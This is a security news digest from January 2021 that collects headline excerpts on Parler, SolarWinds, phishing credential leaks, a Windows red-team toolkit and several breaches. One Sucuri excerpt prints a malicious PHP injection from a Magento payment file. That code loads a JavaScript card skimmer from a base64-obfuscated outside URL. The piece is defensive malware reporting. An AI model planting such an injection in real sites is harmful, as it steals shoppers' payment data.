Security daily (21-01-2021)

Rep. Maloney seeks FBI probe of Parler's role in Capitol attack

The House Oversight and Reform Committee on Thursday asked the FBI to investigate Parler’s role in the storming of the Capitol earlier this month, and its possible ties to Russia. The committee chair, Rep. Carolyn Maloney, D-NY, also requested that FBI Director Christopher Wray order an investigation into the social media application’s financing, according to the letter she sent to the bureau. Parler has come under scrutiny in recent weeks after rioters used the app to plan and coordinate the Jan. 6 attack on the Capitol Building. Apple and Google have removed Parler from their app marketplaces, while Amazon has ejected the site from its web hosting service over violent content. Maloney now contends the federal government should embark on its own probe. The FBI should “conduct a robust examination of the role that the social media site Parler played in the assault, including as a potential facilitator of planning […] The post Rep. Maloney seeks FBI probe of Parler's role in Capitol attack appeared first on CyberScoop. (CyberScoop)

Biden orders US intelligence review of SolarWinds hack

President Joe Biden is ordering U.S. intelligence agencies to provide him with an assessment of a suspected Russian hacking operation that breached multiple U.S. federal agencies and exposed glaring weaknesses in U.S. cyber-defenses, the White House said Thursday. The move highlights how responding to the sophisticated spying operation, which has exploited software made by federal contractor SolarWinds, will shape the early days of Biden’s administration. It was not immediately clear what the intelligence review would entail, but Biden has vowed to get a full understanding of the computer intrusions and their impact. “Even as we work with Russia to advance U.S. interests, so, too, we work to hold Russia to account for its reckless and adversarial actions,” White House Press Secretary Jen Psaki told reporters. Moscow has denied involvement in the hacking campaign. Biden has also tasked intelligence agencies with reviewing the extent of Russian interference in the 2020 election, […] The post Biden orders US intelligence review of SolarWinds hack appeared first on CyberScoop. (CyberScoop)

A phishing campaign's collateral damage: Stolen passwords were publicly searchable

A phishing campaign that targeted multiple industrial sectors in 2020 was messier than the average cybercrime operation. The perpetrators stole more than a thousand sets of credentials from corporate employees and then accidentally exposed that data on the public internet, according to a blog post from cybersecurity firm Check Point. The attackers made a “simple mistake in their attack chain,” the researchers said, by not securing the files once they were posted to sites set up to receive stolen data. The end result was an otherwise successful hacking operation that could have been undercut by sloppiness: A victim or an identity theft prevention system could have stumbled upon the breached data; or another set of crooks could have found the stolen credentials before the original attackers had a chance to sell or use them. “We found that once the users’ information was sent to the drop-zone servers, the data was […] The post A phishing campaign's collateral damage: Stolen passwords were publicly searchable appeared first on CyberScoop. (CyberScoop)

Social engineering gains momentum with cyber criminals

Public healthcare organizations are increasingly targeted by cyberattacks, prompting security strategies that focus more on people, says IT security expert. The post Social engineering gains momentum with cyber criminals appeared first on CyberScoop. (CyberScoop)

S3 Ep16: Darkweb bust, security at home, and browser snoopage [Podcast]

Here's the latest podcast - listen now! (Naked Security)

How to Use RedRabbit for Pen-Testing & Post-Exploitation of Windows Machines

RedRabbit is an ethical hacking toolkit built for pen-testing and reconnaissance. It can be used to identify attack vectors, brute-force protected files, extract saved network passwords, and obfuscate code. RedRabbit, which is made specifically for red teams, is the evil twin of its brother, BlueRabbit, and is the offensive half of the "Rabbit Suite."

The creator of RedRabbit, Ashley Moran, better known as securethelogs, makes a plethora of Windows-based ethical hacking and penetration testing tools. RedRabbit just happens to be one of my favorites.

RedRabbit offers pen-testers of Windows... more (Null Byte « WonderHowTo)

Google Searches Expose Stolen Corporate Credentials

(News ≈ Packet Storm)

Malware Found On Laptops Given Out By Government To Students

(News ≈ Packet Storm)

SAP SolMan Vulnerability Exploitation Detected In The Wild

(News ≈ Packet Storm)

Magento PHP Injection Loads JavaScript Skimmer

A Magento website owner was concerned about malware and reached out to our team for assistance. Upon investigation, we found the website contained a PHP injection in one of the Magento files: ./app/code/core/Mage/Payment/Model/Method/Cc.php ... if ($SERVER["REQUESTMETHOD"] === "GET"){ if (strpos($SERVER["REQUESTURI"], "/onestepcheckout/index/") !== false){ if(!isset($COOKIE["adminhtml"])){ echo filegetcontents(base64decode("aHR0cHM6Ly91bmRlcnNjb3JlZndbLl1jb20vc3JjL2tyZWEuanM=")); } } } To make it more difficult to detect, the JavaScript skimmer is loaded using the PHP function filegetcontents and the URL obfuscated with base64. Continue reading Magento PHP Injection Loads JavaScript Skimmer at Sucuri Blog. (Sucuri Blog)

Einstein Healthcare Network Announces August Breach

Einstein is in violation of the the HHS 60-day breach notification rule, but unlikely to face penalty. (Threatpost)

SQL Server Malware Tied to Iranian Software Firm, Researchers Allege

Researchers have traced the origins of a campaign - infecting SQL servers to mine cryptocurrency - back to an Iranian software firm. (Threatpost)

Google Forms Set Baseline For Widespread BEC Attacks

Researchers warn that attackers are collecting reconnaissance for future business email compromise attacks using Google Forms. (Threatpost)

Google Searches Expose Stolen Corporate Credentials

A phishing campaign spoofs Xerox notifications to lure victims into clicking on malicious HTML attachments. (Threatpost)


/security-daily/ 22-01-2021 23:44:22